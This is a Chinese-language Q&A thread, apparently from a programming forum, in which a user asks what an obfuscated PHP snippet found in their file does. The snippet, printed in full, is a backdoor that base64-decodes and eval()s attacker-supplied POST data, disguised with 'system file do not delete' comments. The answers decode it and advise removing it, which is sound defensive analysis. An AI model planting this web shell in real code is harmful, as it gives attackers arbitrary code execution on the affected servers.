如何在我的一個腳本中解碼這個php代碼

Question

我在我的php文件中有這個。看起來像一些惡意軟件，但我想知道這是什麼意思 什麼做它

<?php //cb6f82f3e4007bdaccf419abafab94c8 
$_= 
//system file do not delete 
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0='; 
//system file do not delete 
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__)); 

Answer 1

看一看base64_decode。

Answer 2

EVAL - 評估一個字符串作爲PHP代碼

注意

中的eval（）語言結構是非常危險的，因爲它允許 執行任意PHP代碼。因此不鼓勵它的使用。如果您 已仔細驗證除了使用此構造外沒有其他選擇，請特別注意不要將任何用戶提供的數據 加入其中，而不事先對其進行正確驗證。

短示例：

<?php 

    $string = 'cup'; 
    $name = 'coffee'; 
    $str = 'This is a $string with my $name in it.'; 
    echo $str. "\n"; 
    eval("\$str = \"$str\";"); 
    echo $str. "\n"; 
?> 

輸出

This is a $string with my $name in it. 
This is a cup with my coffee in it. 

Answer 3

$___代表base64_decode。然後$__是base64_decode'd和評估，其執行以下操作：

$code = base64_decode($_); 
eval($code); 

這最終將執行此：

if(isset($_POST["code"])) 
{ 
    eval(base64_decode($_POST["code"])); 
} 

我會建議你刪除它，並檢查其他文件，如果他們被感染，也。